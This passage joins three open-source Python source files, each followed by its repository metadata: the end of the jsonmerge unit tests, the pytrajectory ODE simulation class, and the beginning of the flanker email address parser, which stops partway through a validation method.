"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a', 'val': {'a': 1}},
{'id': 'b', 'val': {'b': 2}},
]
head = [
{'id': 'a', 'val': {'c': 3}}
]
expected = [
# bug would produce {'b': 2, 'c': 3} here
{'id': 'a', 'val': {'a': 1, 'c': 3}},
{'id': 'b', 'val': {'b': 2}},
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_order_issue_31_2(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a', 'val': {'a': 1}},
{'id': 'b', 'val': {'b': 2}},
]
head = [
# this caused "Unresolvable JSON pointer"
{'id': 'c', 'val': {'c': 3}},
{'id': 'a', 'val': {'c': 3}}
]
expected = [
{'id': 'a', 'val': {'a': 1, 'c': 3}},
{'id': 'b', 'val': {'b': 2}},
{'id': 'c', 'val': {'c': 3}}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_subclass_get_key(self):
class MyArrayMergeById(jsonmerge.strategies.ArrayMergeById):
def get_key(self, walk, item, idRef):
return item.val[-1]
schema = {'mergeStrategy': 'myArrayMergeById'}
merger = jsonmerge.Merger(schema=schema,
strategies={'myArrayMergeById': MyArrayMergeById()})
base = [
[ 'a', 'b', 'id1' ],
[ 'c', 'id2' ],
]
head = [
[ 'e', 'f', 'g', 'id3' ],
[ 'd', 'id1' ],
]
expected = [
[ 'd', 'id1' ],
[ 'c', 'id2' ],
[ 'e', 'f', 'g', 'id3' ],
]
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_multiple_ids(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'mergeOptions': { 'idRef': ['/a', '/b'] }
}
base = [
{
'a': 1,
'b': 2
},
{
'a': 1,
'b': 1,
}
]
head = [
{
'a': 1,
'b': 1,
'c': 2,
},
{
# incomplete key, ignored
'b': 1,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
expected = [
{
'a': 1,
'b': 2
},
{
'a': 1,
'b': 1,
'c': 2,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_multiple_ids_ignore(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'mergeOptions': {
'idRef': ['/a', '/b'],
'ignoreId': [1, 2],
}
}
base = [
{
'a': 1,
'b': 1,
}
]
head = [
{
# ignoreId matches
'a': 1,
'b': 2,
'c': 2,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
expected = [
{
'a': 1,
'b': 1
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_append_with_maxitems(self):
schema = {
"mergeStrategy": "append",
"maxItems": 2,
}
merger = jsonmerge.Merger(schema)
head = ["a"]
base = None
base = merger.merge(base, head)
base = merger.merge(base, head)
base = merger.merge(base, head)
schema2 = merger.get_schema()
jsonschema.validate(head, schema2)
jsonschema.validate(base, schema2)
def test_append_with_unique(self):
schema = {
"mergeStrategy": "append",
"uniqueItems": True,
}
merger = jsonmerge.Merger(schema)
head = ["a"]
base = None
base = merger.merge(base, head)
base = merger.merge(base, head)
schema2 = merger.get_schema()
jsonschema.validate(head, schema2)
jsonschema.validate(base, schema2)
def test_slash_in_property_name(self):
base = {'a': 0}
head = {'b': {'c/d': 1}}
base = jsonmerge.merge(base, head)
self.assertEqual(base, {'a': 0, 'b': {'c/d': 1}})
def test_tilde_in_property_name(self):
base = {'a': 0}
head = {'~1': 1}
base = jsonmerge.merge(base, head)
self.assertEqual(base, {'a': 0, '~1': 1})
def test_discard(self):
schema = {'mergeStrategy': 'discard'}
base = "a"
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "a")
def test_discard_objectmerge_null(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'discard'
}
} }
base = {}
head = {'a': 1}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {})
def test_discard_arraymergebyid(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'items': {
'mergeStrategy': 'discard'
} }
base = [ {'id': 1, 'val': 1} ]
head = [ {'id': 1, 'val': 2} ]
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, [{'id': 1, 'val': 1}])
def test_discard_arraymergebyid_null(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'items': {
'mergeStrategy': 'discard'
} }
base = [ ]
head = [ {'id': 1, 'val': 1} ]
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, [])
def test_discard_null_keep(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'discard',
'mergeOptions': {
'keepIfUndef': True
}
}
} }
base = {}
head = {'a': 1}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 1})
head = {'a': 2}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 1})
def test_bad_strategy(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'invalidStrategy'
} } }
base = {'a': 1 }
head = {'a': 2 }
with self.assertRaises(SchemaError) as cm:
jsonmerge.merge(base, head, schema)
self.assertEqual(cm.exception.value.ref, '#/properties/a')
def test_nan(self):
# float('nan') == float('nan') evaluates to false.
#
# https://github.com/avian2/jsonmerge/issues/39
base = {
"foo": 1,
"bar": float('nan')
}
head = {
"foo": 1,
"bar": float('nan')
}
base = jsonmerge.merge(base, head)
def test_merge_by_index(self):
schema = {
'mergeStrategy': 'arrayMergeByIndex'
}
base = [ {'a': 0 }, {'b': 1} ]
head = [ {'c': 2 }, {'d': 3} ]
result = jsonmerge.merge(base, head, schema)
self.assertEqual(result, [ {'a': 0, 'c': 2}, {'b': 1, 'd': 3} ])
def test_merge_by_index_empty(self):
schema = {
'mergeStrategy': 'arrayMergeByIndex'
}
base = [ ]
head = [ {'c': 2 }, {'d': 3} ]
result = jsonmerge.merge(base, head, schema)
self.assertEqual(result, [ {'c': 2}, {'d': 3} ])
class TestGetSchema(unittest.TestCase):
def test_default_overwrite(self):
schema = {'description': 'test'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'description': 'test'})
def test_default_object_merge_trivial(self):
schema = {'type': 'object'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'type': 'object'})
def test_default_object_merge(self):
schema = {
'properties': {
'foo': {
'mergeStrategy': 'version',
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'properties': {
'foo': {
'type': 'array',
'items': {
'properties': {
'value': {},
}
}
}
}
})
def test_overwrite(self):
schema = {'mergeStrategy': 'overwrite'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {})
def test_append(self):
schema = {'type': 'array',
'mergeStrategy': 'append'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'type': 'array'})
def test_version(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {}
}
}
})
def test_version_ref_twice(self):
schema = {
'properties': {
'a': {
'$ref': '#/definitions/item'
},
'b': {
'$ref': '#/definitions/item'
},
},
'definitions': {
'item': {
'type': 'object',
'mergeStrategy': 'version'
}
}
}
expected = {
'properties': {
'a': {
'$ref': '#/definitions/item'
},
'b': {
'$ref': '#/definitions/item'
},
},
'definitions': {
'item': {
'type': 'array',
'items': {
'properties': {
'value': {
'type': 'object',
}
}
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(expected, schema2)
def test_version_meta(self):
schema = {'type': 'object',
'mergeStrategy': 'version'}
meta = {
'properties': {
'date': {},
'version': {}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema(merge_options={
'version': {'metadataSchema': meta}})
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {'type': 'object'},
'date': {},
'version': {}
}
}
})
def test_version_meta_deprecated(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with warnings.catch_warnings(record=True) as w:
merger.get_schema(meta={'foo': 'bar'})
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_version_meta_in_schema(self):
schema = {
'type': 'object',
'mergeStrategy': 'version',
'mergeOptions': {
'metadataSchema': {
'properties': {
'date': {},
'version': {},
},
},
},
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {'type': 'object'},
'date': {},
'version': {}
}
}
})
def test_version_limit(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'limit': 5}}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {}
}
},
'maxItems': 5
})
def test_object_merge_simple(self):
schema = {'mergeStrategy': 'objectMerge'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {})
def test_object_merge_nested(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'foo': {'mergeStrategy': 'version'}
}}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'properties': {
'foo': {
'type': 'array',
'items': {
'properties': {
'value': {}
}
}
}
}
})
def test_anyof_descend(self):
# We don't support descending through 'anyOf', since each branch could
# have its own rules for merging. How could we then decide which rule
# to follow?
schema = {
'anyOf': [
{'properties': {'a': {}}},
{'properties': {'b': {}}}
]
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.get_schema()
self.assertEqual(cm.exception.value.ref, '#')
def test_anyof_dont_descend(self):
# However, 'anyOf' should be fine if we don't descend through it (e.g.
# if it's after a 'overwrite' strategy for instance.
schema = {
'properties': {
'a': {
'mergeStrategy': 'overwrite',
'properties': {
'b': {
'anyOf': [
{'properties': {'c': {}}},
{'properties': {'d': {}}},
]
}
}
}
}
}
expected = {
'properties': {
'a': {
'properties': {
'b': {
'anyOf': [
{'properties': {'c': {}}},
{'properties': {'d': {}}},
]
}
}
}
}
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
def test_external_refs(self):
schema_1 = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/foo'
}
# get_schema() shouldn't do external HTTP requests for schemas.
merger = jsonmerge.Merger(schema_1)
mschema = merger.get_schema()
d = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/foo'
}
self.assertEqual(d, mschema)
def test_internal_refs(self):
schema = {
'id': 'http://example.com/schema_1.json',
'mergeStrategy': 'overwrite',
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': {
'properties': {
'baz': {}
}
}
}
}
expected = {
'id': 'http://example.com/schema_1.json',
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': {
'properties': {
'baz': {}
}
}
}
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
def test_ref_to_non_object_is_an_error(self):
schema = {
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': []
}
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.get_schema()
self.assertEqual(cm.exception.value.ref, '#/properties/foo')
def test_reference_in_meta(self):
schema = {'mergeStrategy': 'version'}
meta_schema = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/meta'
}
schema_2 = {
'id': 'http://example.com/schema_2.json',
'definitions': {
'meta': {
'properties': {
'foo': {
'type': 'string'
},
'bar': {
'enum': [ 'a', 'b' ]
}
}
}
}
}
merger = jsonmerge.Merger(schema)
merger.cache_schema(schema_2)
mschema = merger.get_schema(merge_options={
'version': {'metadataSchema': meta_schema}})
self.assertEqual(mschema,
{
'type': 'array',
'items': {
'properties': {
'value': {},
'foo': {'type': 'string'},
'bar': {'enum': ['a', 'b'] },
}
}
})
def test_local_reference_in_meta(self):
schema = {
'properties': {
'content': {
'mergeStrategy': 'version',
'mergeOptions': {
'metadataSchema': {
'$ref': '#/definitions/metadata',
},
},
},
},
'definitions': {
'metadata': {
'properties': {
'revision': {
'type': 'number',
},
},
},
},
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(mschema, {
'properties': {
'content': {
'type': 'array',
'items': {
'properties': {
'value': {},
'revision': {
'type': 'number',
},
},
},
},
},
'definitions': {
'metadata': {
'properties': {
'revision': {
'type': 'number',
},
},
},
},
})
def test_array_in_schema(self):
schema = {
'mergeStrategy': 'overwrite',
'enum': [
"foo",
"bar",
]
}
expected = {
'enum': [
"foo",
"bar",
]
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
    def test_version_adds_array_type(self):
        """The version strategy rewrites a deeply nested scalar property into
        an array of {value: <original schema>} items."""
        schema = {
            "type": "object",
            "properties": {
                "buyer": {
                    "properties": {
                        "id": {
                            "type": "object",
                            "properties": {
                                "name": {
                                    "type": "string",
                                    "mergeStrategy": "version"
                                }
                            }
                        }
                    }
                }
            }
        }
        expected = {
            "type": "object",
            "properties": {
                "buyer": {
                    "properties": {
                        "id": {
                            "type": "object",
                            "properties": {
                                "name": {
                                    "type": "array",
                                    "items": {
                                        "properties": {
                                            "value": {
                                                "type": "string"
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_merge_by_id(self):
        """arrayMergeById is dropped from the synthesized schema; the items
        subschema passes through unchanged."""
        schema = {
            "mergeStrategy": "arrayMergeById",
            "items": {
                'type': 'object'
            }
        }
        expected = {
            "items": {
                'type': 'object'
            }
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_merge_by_id_with_depth(self):
        """get_schema() must descend through a $ref under arrayMergeById and
        rewrite the versioned field inside the referenced definition."""
        schema = {
            "properties": {
                "test": {
                    "mergeStrategy": "arrayMergeById",
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                }
            },
            "definitions": {
                "refitem": {
                    "type": "object",
                    "properties": {
                        "field1": {
                            "type": "string",
                            "mergeStrategy": "version"
                        }
                    }
                }
            }
        }
        expected = {
            "properties": {
                "test": {
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                }
            },
            "definitions": {
                "refitem": {
                    "type": "object",
                    "properties": {
                        "field1": {
                            "type": "array",
                            "items": {
                                "properties": {
                                    "value": {
                                        "type": "string"
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_merge_by_id_with_depth_twice(self):
        """A $ref visited from two different properties must still be
        rewritten exactly once and consistently."""
        # Here were have a $ref that get_schema() should descend into twice.
        schema = {
            "properties": {
                "test": {
                    "mergeStrategy": "arrayMergeById",
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                },
                "test2": {
                    "mergeStrategy": "arrayMergeById",
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                }
            },
            "definitions": {
                "refitem": {
                    "type": "object",
                    "properties": {
                        "field1": {
                            "type": "string",
                            "mergeStrategy": "version"
                        }
                    }
                }
            }
        }
        expected = {
            "properties": {
                "test": {
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                },
                "test2": {
                    "type": "array",
                    "items": {
                        "$ref": "#/definitions/refitem"
                    }
                }
            },
            "definitions": {
                "refitem": {
                    "type": "object",
                    "properties": {
                        "field1": {
                            "type": "array",
                            "items": {
                                "properties": {
                                    "value": {
                                        "type": "string"
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        self.maxDiff = None
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_merge_by_id_with_depth_no_ref(self):
        """Same rewrite as the $ref variants above but with the items schema
        inlined directly under arrayMergeById."""
        schema = {
            "properties": {
                "test": {
                    "mergeStrategy": "arrayMergeById",
                    "type": "array",
                    "items": {
                        "type": "object",
                        "properties": {
                            "field1": {
                                "type": "string",
                                "mergeStrategy": "version"
                            }
                        }
                    }
                }
            }
        }
        expected = {
            "properties": {
                "test": {
                    "type": "array",
                    "items": {
                        "type": "object",
                        "properties": {
                            "field1": {
                                "type": "array",
                                "items": {
                                    "properties": {
                                        "value": {
                                            "type": "string"
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            },
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_merge_append_additional(self):
        """Merge strategies are stripped from both properties and
        additionalProperties subschemas."""
        schema = {'mergeStrategy': 'objectMerge',
                  'properties': {
                      'b': {'mergeStrategy': 'overwrite'}
                  },
                  'additionalProperties': {
                      'mergeStrategy': 'append'
                  }}
        expected = {'properties': {
                        'b': {},
                    },
                    'additionalProperties': {}
                }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
def test_merge_additional_bool(self):
schema = {'additionalProperties': True}
base = {}
head = {'a': 'a'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, schema)
    def test_oneof(self):
        """get_schema() descends into each oneOf branch and strips the merge
        strategy annotations found there."""
        schema = {
            'oneOf': [
                {
                    'type': 'array',
                    'mergeStrategy': 'append'
                },
                {
                    'type': 'object'
                }
            ]
        }
        expected = {
            'oneOf': [
                {
                    'type': 'array',
                },
                {
                    'type': 'object'
                }
            ]
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_oneof_recursive(self):
        """A self-referential oneOf schema ('#' $ref) must not send
        get_schema() into infinite recursion."""
        # Schema to merge all arrays with "append" strategy and all objects
        # with the default "objectMerge" strategy.
        schema = {
            "oneOf": [
                {
                    "type": "array",
                    "mergeStrategy": "append"
                },
                {
                    "type": "object",
                    "additionalProperties": {
                        "$ref": "#"
                    }
                },
                {
                    "type": "string"
                },
            ]
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, schema)
    def test_oneof_toplevel(self):
        """A top-level version strategy wraps the whole oneOf under the
        items/value structure of the versioned array."""
        schema = {
            "mergeStrategy": "version",
            "oneOf": [
                {"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
                {"type": "string", "format": "hostname"}
            ]
        }
        expected = {
            "type": "array",
            "items": {
                "properties": {
                    "value": {
                        "oneOf": [
                            {"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
                            {"type": "string", "format": "hostname"}
                        ]
                    }
                }
            }
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_anyof_toplevel(self):
        """Same wrapping behaviour as test_oneof_toplevel, but for anyOf."""
        schema = {
            "mergeStrategy": "version",
            "anyOf": [
                {"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
                {"type": "string", "format": "hostname"}
            ]
        }
        expected = {
            "type": "array",
            "items": {
                "properties": {
                    "value": {
                        "anyOf": [
                            {"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
                            {"type": "string", "format": "hostname"}
                        ]
                    }
                }
            }
        }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        self.assertEqual(schema2, expected)
    def test_discard(self):
        """The discard strategy annotation is removed; the value schema
        itself is kept."""
        schema = { 'type': 'string',
                   'mergeStrategy': 'discard' }
        merger = jsonmerge.Merger(schema)
        schema2 = merger.get_schema()
        expected = { 'type': 'string' }
        self.assertEqual(schema2, expected)
    def test_bad_strategy(self):
        """An unknown mergeStrategy name raises SchemaError whose ref points
        at the offending subschema."""
        schema = {
            'properties': {
                'a': {
                    'mergeStrategy': 'invalidStrategy'
                } } }
        merger = jsonmerge.Merger(schema)
        with self.assertRaises(SchemaError) as cm:
            merger.get_schema()
        self.assertEqual(cm.exception.value.ref, '#/properties/a')
    def test_merge_by_index(self):
        """arrayMergeByIndex is stripped from the synthesized schema."""
        schema = {
            'type': 'array',
            'mergeStrategy': 'arrayMergeByIndex'
        }
        merger = jsonmerge.Merger(schema)
        result = merger.get_schema()
        self.assertEqual(result, {'type': 'array'})
    def test_merge_by_index_name_in_exception(self):
        """Merging a non-array head under arrayMergeByIndex raises
        HeadInstanceError mentioning the strategy name."""
        schema = {
            'properties': {
                'a': {
                    'mergeStrategy': 'arrayMergeByIndex'
                }
            }
        }
        # head is an object where the strategy expects an array
        head = {'a': {}}
        base = {'a': []}
        merger = jsonmerge.Merger(schema)
        with self.assertRaises(HeadInstanceError) as cm:
            merger.merge(base, head)
        self.assertIn('arrayMergeByIndex', str(cm.exception))
class TestExceptions(unittest.TestCase):
    """Check the human-readable formatting produced by SchemaError.__str__."""
    def test_str_with_ref(self):
        """Message followed by the JSON pointer of the offending value."""
        err = SchemaError("Test error", JSONValue({}, '#'))
        self.assertEqual(str(err), 'Test error: #')
    def test_str(self):
        """Just the message when no JSONValue is attached."""
        err = SchemaError("Test error")
        self.assertEqual(str(err), 'Test error')
    def test_str_with_name(self):
        """Strategy name prefix, then message, then the pointer."""
        err = SchemaError("Test error", JSONValue({}, '#'), 'test')
        self.assertEqual(str(err), "'test' merge strategy: Test error: #")
if __name__ == '__main__':
    # run the whole suite when the file is executed directly
    unittest.main()
| avian2/jsonmerge | tests/test_jsonmerge.py | Python | mit | 69,662 |
import numpy as np
from scipy.integrate import ode
class Simulator(object):
    '''
    This class simulates the initial value problem that results from solving
    the boundary value problem of the control system.

    Parameters
    ----------
    ff : callable
        Vectorfield of the control system, called as ``ff(x, u)``.
    T : float
        Simulation time.
    start : list
        Initial state of the system at ``t = 0``.
    u : callable
        Function of the input variables, called as ``u(t)``.
    dt : float
        Time step.
    '''
    def __init__(self, ff, T, start, u, dt=0.01):
        self.ff = ff
        self.T = T
        self.u = u
        self.dt = dt
        # this is where the solutions go
        self.xt = []
        self.ut = []
        # time steps
        self.t = []
        # get the values at t=0
        self.xt.append(start)
        self.ut.append(self.u(0.0))
        self.t.append(0.0)
        # initialise our ode solver
        self.solver = ode(self.rhs)
        self.solver.set_initial_value(start)
        self.solver.set_integrator('vode', method='adams', rtol=1e-6)
        #self.solver.set_integrator('lsoda', rtol=1e-6)
        #self.solver.set_integrator('dop853', rtol=1e-6)
    def rhs(self, t, x):
        '''
        Returns the right hand side (vector field) of the ode system.
        '''
        u = self.u(t)
        dx = self.ff(x, u)
        return dx
    def calcStep(self):
        '''
        Calculates one step of the simulation.

        Returns
        -------
        tuple
            Current solver time (rounded to 5 decimals to keep float noise
            out of the recorded time stamps) and the new state vector.
        '''
        x = list(self.solver.integrate(self.solver.t + self.dt))
        t = round(self.solver.t, 5)
        # only record samples that fall inside the simulation horizon
        if 0 <= t <= self.T:
            self.xt.append(x)
            self.ut.append(self.u(t))
            self.t.append(t)
        return t, x
    def simulate(self):
        '''
        Starts the simulation.

        Returns
        -------
        list
            Numpy arrays with time steps and simulation data of system and
            input variables.

        Raises
        ------
        RuntimeError
            If the underlying ODE solver reports a failed integration step.
            (Previously a failed step could make this loop spin forever,
            since ``solver.integrate`` stops advancing ``solver.t``.)
        '''
        t = 0
        while t <= self.T:
            t, x = self.calcStep()
            if not self.solver.successful():
                raise RuntimeError('Integration step failed at t = %f' % t)
        return [np.array(self.t), np.array(self.xt), np.array(self.ut)]
| akunze3/pytrajectory | pytrajectory/simulation.py | Python | bsd-3-clause | 2,039 |
# coding:utf-8
'''
_AddressParser is an implementation of a recursive descent parser for email
addresses and urls. While _AddressParser can be used directly it is not
recommended, use the the parse() and parse_list() methods which are provided
in the address module for convenience.
The grammar supported by the parser (as well as other limitations) are
outlined below. Plugins are also supported to allow for custom more
restrictive grammar that is typically seen at large Email Service Providers
(ESPs).
For email addresses, the grammar tries to stick to RFC 5322 as much as
possible, but includes relaxed (lax) grammar as well to support for common
realistic uses of email addresses on the Internet.
Grammar:
address-list -> address { delimiter address }
mailbox -> name-addr-rfc | name-addr-lax | addr-spec | url
name-addr-rfc -> [ display-name-rfc ] angle-addr-rfc
display-name-rfc -> [ whitespace ] word { whitespace word }
angle-addr-rfc -> [ whitespace ] < addr-spec > [ whitespace ]
name-addr-lax -> [ display-name-lax ] angle-addr-lax
display-name-lax -> [ whitespace ] word { whitespace word } whitespace
angle-addr-lax -> addr-spec [ whitespace ]
addr-spec -> [ whitespace ] local-part @ domain [ whitespace ]
local-part -> dot-atom | quoted-string
domain -> dot-atom
word -> word-ascii | word-unicode
word-ascii -> atom | quoted-string
word-unicode -> unicode-atom | unicode-qstring
whitespace -> whitespace-ascii | whitespace-unicode
Additional limitations on email addresses:
1. local-part:
* Must not be greater than 64 octets
2. domain:
* No more than 127 levels
* Each level no more than 63 octets
* Texual representation can not exceed 253 characters
* No level can being or end with -
3. Maximum mailbox length is len(local-part) + len('@') + len(domain) which
is 64 + 1 + 253 = 318 characters. Allow 194 characters for a display
name and the (very generous) limit becomes 512 characters. Allow 1024
mailboxes and the total limit on a mailbox-list is 524288 characters.
'''
import re
import flanker.addresslib.address
from flanker.addresslib.tokenizer import TokenStream
from flanker.addresslib.tokenizer import LBRACKET
from flanker.addresslib.tokenizer import AT_SYMBOL
from flanker.addresslib.tokenizer import RBRACKET
from flanker.addresslib.tokenizer import DQUOTE
from flanker.addresslib.tokenizer import BAD_DOMAIN
from flanker.addresslib.tokenizer import DELIMITER
from flanker.addresslib.tokenizer import RELAX_ATOM
from flanker.addresslib.tokenizer import WHITESPACE
from flanker.addresslib.tokenizer import UNI_WHITE
from flanker.addresslib.tokenizer import ATOM
from flanker.addresslib.tokenizer import UNI_ATOM
from flanker.addresslib.tokenizer import UNI_QSTR
from flanker.addresslib.tokenizer import DOT_ATOM
from flanker.addresslib.tokenizer import QSTRING
from flanker.addresslib.tokenizer import URL
from flanker.mime.message.headers.encoding import encode_string
from flanker.utils import is_pure_ascii
from flanker.utils import contains_control_chars
from flanker.utils import cleanup_display_name
from flanker.utils import cleanup_email
from flanker.utils import to_utf8
class _AddressParser(object):
    '''
    Do not use _AddressParser directly because it heavily relies on other
    private classes and methods and its interface is not guaranteed. It
    will change in the future and possibly break your application.
    Instead use the parse() and parse_list() functions in the address.py
    module which will always return a scalar or iterable respectively.
    '''
    def __init__(self, strict=False):
        # the token stream is created lazily by the public entry points
        self.stream = None
        # strict mode follows the RFC grammar only; relaxed mode also
        # accepts the lax grammar described in the module docstring
        self.strict = strict
    def address_list(self, stream):
        '''
        Extract a mailbox and/or url list from a stream of input, operates in
        strict and relaxed modes.
        Returns an AddressList in strict mode, or a tuple of
        (AddressList, list of unparsable fragments) in relaxed mode.
        Raises ParserException on empty, non-ASCII str, or oversized input.
        '''
        # sanity check
        if not stream:
            raise ParserException('No input provided to parser.')
        if isinstance(stream, str) and not is_pure_ascii(stream):
            raise ParserException('ASCII string contains non-ASCII chars.')
        # to avoid spinning here forever, limit address list length
        if len(stream) > MAX_ADDRESS_LIST_LENGTH:
            raise ParserException('Stream length exceeds maximum allowable ' + \
                'address list length of ' + str(MAX_ADDRESS_LIST_LENGTH) + '.')
        # set stream
        self.stream = TokenStream(stream)
        if self.strict is True:
            return self._address_list_strict()
        return self._address_list_relaxed()
    def address(self, stream):
        '''
        Extract a single address or url from a stream of input, always
        operates in strict mode.
        Returns the parsed address object, or None if the stream does not
        contain exactly one valid address.
        '''
        # sanity check
        if not stream:
            raise ParserException('No input provided to parser.')
        if isinstance(stream, str) and not is_pure_ascii(stream):
            raise ParserException('ASCII string contains non-ASCII chars.')
        # to avoid spinning here forever, limit mailbox length
        if len(stream) > MAX_ADDRESS_LENGTH:
            raise ParserException('Stream length exceeds maximum allowable ' + \
                'address length of ' + str(MAX_ADDRESS_LENGTH) + '.')
        self.stream = TokenStream(stream)
        addr = self._address()
        if addr:
            # optional whitespace
            self._whitespace()
            # if we hit the end of the stream, we have a valid inbox
            if self.stream.end_of_stream():
                return addr
        return None
    def address_spec(self, stream):
        '''
        Extract a single address spec from a stream of input, always
        operates in strict mode.
        Returns an EmailAddress, or None if the stream is not exactly one
        valid addr-spec.
        '''
        # sanity check
        if stream is None:
            raise ParserException('No input provided to parser.')
        if isinstance(stream, str) and not is_pure_ascii(stream):
            raise ParserException('ASCII string contains non-ASCII chars.')
        # to avoid spinning here forever, limit mailbox length
        if len(stream) > MAX_ADDRESS_LENGTH:
            raise ParserException('Stream length exceeds maximum allowable ' + \
                'address length of ' + str(MAX_ADDRESS_LENGTH) + '.')
        self.stream = TokenStream(stream)
        addr = self._addr_spec()
        if addr:
            # optional whitespace
            self._whitespace()
            # if we hit the end of the stream, we have a valid inbox
            if self.stream.end_of_stream():
                return addr
        return None
    def _mailbox_post_processing_checks(self, address):
        "Additional post processing checks to ensure mailbox is valid."
        parts = address.split('@')
        # check if local part is less than 256 octets, the actual
        # limit is 64 octets but we quadruple the size here because
        # unsubscribe links are frequently longer
        lpart = parts[0]
        if len(lpart) > 256:
